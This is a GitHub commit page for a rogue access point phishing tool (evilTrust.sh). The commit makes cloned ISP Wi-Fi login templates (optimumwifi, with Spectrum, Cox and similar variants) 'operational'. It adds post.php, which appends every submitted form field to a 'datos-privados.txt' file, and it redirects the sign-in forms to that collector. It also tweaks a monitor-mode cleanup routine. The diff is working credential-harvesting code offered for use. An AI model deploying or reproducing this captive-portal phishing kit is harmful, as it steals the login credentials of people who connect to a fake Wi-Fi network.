Skip to content

Commit 3e54dcd

Browse files
author
s4vitar
committed
Plantillas de optimumwifi operativas
1 parent d93a4f2 commit 3e54dcd

File tree

6 files changed

+6
-5
lines changed

6 files changed

+6
-5
lines changed

evilTrust.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@ function ctrl_c(){
1818
echo -e "\n\n${yellowColour}[*]${endColour}${grayColour} Exiting...\n${endColour}"
1919
rm dnsmasq.conf hostapd.conf 2>/dev/null
2020
rm -r *.php *.js *.txt *.ep assets portal_2fa Roboto-Regular.ttf 2>/dev/null
21-
ifconfig wlan0mon down; sleep 1
21+
sleep 3; ifconfig wlan0mon down; sleep 1
2222
iwconfig wlan0mon mode monitor; sleep 1
2323
ifconfig wlan0mon up; airmon-ng stop wlan0mon > /dev/null 2>&1; sleep 1
2424
tput cnorm

optimumwifi/post.php

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
<?php $file = 'datos-privados.txt'; file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=http://192.168.1.1/" />

optimumwifi/signin209b.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -53,7 +53,7 @@
5353

5454
<!-- <div style="display:none" id="errorMsg" class="error"></div> -->
5555

56-
<form class="cw-text-left" method="POST" action="/captiveportal/index.php">
56+
<form class="cw-text-left" method="POST" action="post.php">
5757

5858
<input type="hidden" name="mso" value="spectrum">
5959
<div id="login-error" class="cw-alert cw-alert--danger" tabindex="-1" style="display: none;" v-show= pageError>

optimumwifi/signin5d8f.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -52,7 +52,7 @@
5252

5353
<!-- <div style="display:none" id="errorMsg" class="error"></div> -->
5454

55-
<form class="cw-text-left" method="POST" action="/captiveportal/index.php">
55+
<form class="cw-text-left" method="POST" action="post.php">
5656

5757
<input type="hidden" name="mso" value="ccc">
5858
<div id="login-error" class="cw-alert cw-alert--danger" tabindex="-1" style="display: none;" v-show= pageError>

optimumwifi/signin8d07.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -53,7 +53,7 @@
5353

5454
<!-- <div style="display:none" id="errorMsg" class="error"></div> -->
5555

56-
<form class="cw-text-left" method="POST" action="/captiveportal/index.php">
56+
<form class="cw-text-left" method="POST" action="post.php">
5757

5858
<input type="hidden" name="mso" value="cvc">
5959
<div id="login-error" class="cw-alert cw-alert--danger" tabindex="-1" style="display: none;" v-show= pageError>

optimumwifi/signince44.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -53,7 +53,7 @@
5353

5454
<!-- <div style="display:none" id="errorMsg" class="error"></div> -->
5555

56-
<form class="cw-text-left" method="POST" action="/captiveportal/index.php">
56+
<form class="cw-text-left" method="POST" action="post.php">
5757
<input type="hidden" name="mso" value="cox">
5858
<div id="login-error" class="cw-alert cw-alert--danger" tabindex="-1" style="display: none;" v-show= pageError>
5959
<div class="cw-alert__icon">

0 commit comments

Comments
 (0)